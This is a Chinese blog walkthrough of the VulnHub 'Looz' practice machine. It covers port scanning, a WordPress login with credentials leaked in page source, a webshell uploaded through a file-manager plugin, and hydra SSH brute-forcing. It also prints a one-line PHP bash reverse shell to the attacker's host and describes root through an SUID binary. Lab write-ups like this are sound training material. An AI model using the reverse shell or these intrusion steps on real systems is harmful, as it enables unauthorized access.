【Looz靶机】

最新推荐文章于 2023-04-14 00:59:07 发布
最新推荐文章于 2023-04-14 00:59:07 发布
阅读量708 收藏 1
点赞数
分类专栏: 靶机挑战 文章标签: 安全 web安全 docker 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40646572/article/details/125073120
版权

信息收集

在这里插入图片描述
开启靶机。
在这里插入图片描述

web服务探测

通过nmap扫描,发现靶机IP地址以及对应开启的端口,发现80、22、3306、8081端口开启,先打开80端口的网站,发现源码存在提示。
在这里插入图片描述
存在一个账号以及对应的密码。
john:y0uC@n’tbr3akIT。
但经过目录扫描,未发现任何可以利用的页面。
扫描8081端口,发现该端口存在web服务。
在这里插入图片描述
但直接使用ip地址:8081无法进入,使用dirsearch目录进行探测,发现是wordpress。
在这里插入图片描述
进入/wp-admin/目录,发现需要跳转到http://wp.looz.com/网站,配置/etc/passwd文件域名解析,绑定10.0.2.10靶机ip地址,即可正常跳转。
在这里插入图片描述
使用在http://10.0.2.10/web主页源码中提及的john用户登录
在这里插入图片描述
登陆成功。
查找shell上传点。
添加file mannager插件。
在这里插入图片描述
直接添加文件。
在这里插入图片描述
在这里插入图片描述
使用phpinfo测试成功。
修改shell中代码,使用bash反弹shell。

<?php system('bash -c "bash -i >& /dev/tcp/10.0.2.15/4444 0>&1"');?>

kali靶机开启4444端口监听。
在这里插入图片描述
经过一番探测,发现这是一个docker容器。。。。我裂开。
在这里插入图片描述
使用cat指令读取/proc/1/cgroup文件,确认这是一个docker容器。。

ssh爆破

在wordpress网站中发现了一个用户名 gandalf。
在这里插入图片描述
由于靶机开启了22端口,而且web服务是运行在docker容器中,就考虑到使用hydra爆破ssh登录靶机。
在这里插入图片描述
在这里插入图片描述
ssh爆破成功,存在用户gandalf,并且密码是highschoolmusical。
hydra使用的密码字典是kali靶机自带的/usr/share/wordlists/rockyou.txt字典。

提权

在这里插入图片描述
登录gandalf用户后,在/home目录下发现存在alatar用户。
先使用linux探针,linpeas.sh。
在这里插入图片描述

在这里插入图片描述
执行探针,发现存在alatar用户,并且该用户权限比gandalf用户权限更高。
在这里插入图片描述
在探针反馈的信息中suid存在/home/alatar/Private/shell_testv1.0 (Unknown SUID binary)。这是一个可疑文件,没错,运行这个文件直接获取到root权限。
在这里插入图片描述
获取root权限后,查看下靶机运行的docker服务,我很不爽。。。
在这里插入图片描述
没错,确实运行着docker服务,并且是两个。。。
读取下/root目录下的root.txt文本文件。

在这里插入图片描述
发现是一串字符,盲猜md5加密,解密后发现是gandalf。。。。
在这里插入图片描述
ok,这个靶机到此结束。

参考链接

LOOZ: 1靶机下载地址:https://www.vulnhub.com/entry/looz-1,732/.
如何判断当前linux是 docker容器 还是 虚拟机/物理机:https://blog.csdn.net/mar_ljh/article/details/109011822.
md5解密网站:https://www.somd5.com/.

bigdogeggs
关注
专栏目录
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6669
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
靶机渗透练习67-Looz
hirak0的博客
04-20 854
靶机描述 靶机地址:https://www.vulnhub.com/entry/looz-1,732/ Description Not that hard and not that easy, it’s always straightforward if you can imagine it inside your mind. If you need any help you can find me on Twitter @mhz_cyber , and I will be happy to read
Vulnhub之Looz靶机
CySeker's Blog
04-14 757
信息搜集,访问80、8081端口,查看网页源码,搜集用户名和密码,登录WordPress后台,收集到管理员信息,发现WordPress后台无法利用,根据获得的管理员信息,尝试进行SSH爆破。成功爆破出一个管理员的密码,ssh连接,信息收集,提权。
VulbHub日记(七):Looz
Dawn_Xi的博客
09-13 276
靶机介绍 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.116 fping -aqg 192.168.56.0/24
vulnhub之Looz: 1
qwweggfe的博客
09-10 1035
0x001 渗透过程 首先进行ip扫描 于是查看ip开启了哪些服务 nmap -sC -sV 192.168.181.162 -p- --min-rate=20000 -v 由于开启了80端口,打开网页进行查看
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
OWASP靶机安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Linux中在防火墙中开启80端口方法示例
09-15
主要介绍了Linux中在防火墙中开启80端口方法示例,具有一定参考价值,需要的朋友可以了解下。
安装部署WEB安全测试用的靶机(DVWA,MCIR,pikachu,mutillidae,bwapp)
reqian23
03-06 767
1.准备 Windows 2008 r2 或者 CentOS 虚拟机(本案例以 Windows 2008 r2 为范本) 5个靶机及xampp在这里 链接:https://pan.baidu.com/s/1MWzZuVt8kfTIPeEVcrDniA 提取码:7lpt 在Windows 2008 r2上安装xampp 一直下一步就可以 安装完之后会自动打开,先关掉(还有托盘里的) 删掉目录下的临时文件: 找到xampp-control,右击属性-兼容性-以管理员身份运行 发
靶场练习第二十五天~vulnhub靶场之Raven-2
qq_57976347的博客
02-18 1072
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.128 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 访问靶机网站,
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2199
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
对DC-8靶机进行渗透测试
zll___的博客
03-24 525
对DC-8靶机进行渗透测试
kali如何开放端口
single_g_l的博客
03-06 1万+
安装ufw apt-get install ufw ufw命令使用: 检查防火墙的状态(默认 inactive)$ ufw status 防火墙版本 $ ufw version 设置 启动ufw防火墙 $ ufw enable 默认禁止访问所有 $ ufw default deny 上面两条一定要做,之后需要开哪个端口再用下面方法开启某个端口 开放6379端口(redis) $ ufw all...
Kali-linux查看打开的端口
热门推荐
weixin_34344403的博客
04-18 1万+
对一个大范围的网络或活跃的主机进行渗透测试,必须要了解这些主机上所打开的端口号。在Kali Linux中默认提供了Nmap和Zenmap两个扫描端口工具。为了访问目标系统中打开的TCP和UDP端口,本节将介绍Nmap和Zenmap工具的使用。 4.4.1 TCP端口扫描工具Nmap 使用Nmap工具查看目标主机192.168.41.136上开放的端口号。执行命令如下所示: root@ka...
关于NETCAT的学习笔记
Mi1k7ea
02-26 1096
本文是学习笔记,不足之处很多,望各位指点指点~ 作为Kali中的一款基本的工具,我们需要学会对NC的掌握。下面主要从NC的功能方面展开讲。 NC的功能: NC可以完成Telnet的所有功能,而且比Telnet更好(telnet/banner): 通过-h参数查看参数信息: nc -h 通过-n参数后面输入IP地址而不是DNS域名,-v参数显示详细的信息,下面直接nc Metasploi
linux开启端口命令
亮亮同學的博客
09-29 9589
1. 开放端口命令: /sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT 2.保存:/etc/rc.d/init.d/iptables save 3.重启服务:/etc/init.d/iptables restart 4.查看端口是否开放:/sbin/iptables -L -n
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值